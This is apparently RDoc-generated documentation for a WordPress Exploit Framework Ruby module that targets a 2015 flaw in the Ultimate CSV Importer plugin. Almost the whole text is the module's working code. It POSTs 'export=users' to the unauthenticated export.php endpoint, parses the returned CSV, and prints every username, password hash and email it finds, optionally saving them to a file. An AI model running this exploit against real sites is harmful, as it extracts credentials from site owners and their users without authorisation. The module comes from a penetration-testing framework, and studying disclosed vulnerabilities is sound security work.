class Wpxf::Auxiliary::UltimateCsvImporterUserExtract

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::Net::HttpClient::new
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb, line 9
def initialize
  super

  update_info(
    name: 'Ultimate CSV Importer User Table Extract',
    desc: %(
      Due to lack of verification of a visitor's permissions, it is
      possible to execute the 'export.php' script included in the
      default installation of the Ultimate CSV Importer plugin and
      retrieve the full contents of the user table in the WordPress
      installation. This results in full disclosure of usernames,
      hashed passwords and email addresses for all users.
    ),
    author: [
      'James Hooker', # Disclosure
      'rastating'     # WPXF module
    ],
    references: [
      ['WPVDB', '7778']
    ],
    date: 'Feb 02 2015'
  )

  register_options([
    StringOption.new(
      name: 'export_path',
      desc: 'The file to save the export to',
      required: false
    )
  ])
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb, line 41
def check
  check_plugin_version_from_readme('wp-ultimate-csv-importer', '3.6.7', '3.6.0')
end
export_path() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb, line 45
def export_path
  return nil if normalized_option_value('export_path').nil?
  File.expand_path normalized_option_value('export_path')
end
exporter_url() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb, line 54
def exporter_url
  normalize_uri(plugin_url, 'modules', 'export', 'templates', 'export.php')
end
parse_csv(body, delimiter) click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb, line 77
def parse_csv(body, delimiter)
  begin
    CSV::Converters[:blank_to_nil] = lambda do |field|
      field && field.empty? ? nil : field
    end
    csv = CSV.new(
      body,
      :col_sep => delimiter,
      :headers => true,
      :header_converters => :symbol,
      :converters => [:all, :blank_to_nil]
    )
    csv.to_a.map { |row| process_row(row) }
    return true
  rescue
    return false
  end
end
payload_body() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb, line 58
def payload_body
  builder = Utility::BodyBuilder.new
  builder.add_field('export', 'users')
  builder.create do |body|
    return body
  end
end
plugin_url() click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb, line 50
def plugin_url
  normalize_uri(wordpress_url_plugins, 'wp-ultimate-csv-importer')
end
process_row(row) click to toggle source
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb, line 66
def process_row(row)
  if row[:user_login] && row[:user_pass]
    emit_success "Found credential: #{row[:user_login]}:#{row[:user_pass]}", true
    @credentials.push({
        username: row[:user_login],
        password: row[:user_pass],
        email: row[:user_email]
    })
  end
end
run() click to toggle source
Calls superclass method Wpxf::Module#run
# File lib/wpxf/modules/auxiliary/hash_dump/ultimate_csv_importer_user_extract.rb, line 96
def run
  return false unless super

  @credentials = [{
    username: 'Username', password: 'Password Hash', email: 'E-mail'
  }]

  emit_info 'Requesting CSV extract...'
  res = execute_post_request(url: exporter_url, body: payload_body)

  if res.nil?
    emit_error 'No response from the target'
    return false
  end

  if res.code != 200
    emit_error "Server responded with code #{res.code}"
    return false
  end

  emit_info 'Parsing response...'
  unless parse_csv(res.body, ',') || parse_csv(res.body, ';')
    emit_error 'Failed to parse response, the CSV was invalid'
    emit_info "CSV content: #{res.body}", true
    return false
  end

  emit_table @credentials

  if export_path
    emit_info 'Saving export...'
    File.open(export_path, 'w') { |file| file.write(res.body) }
    emit_success "Saved export to #{export_path}"
  end

  true
end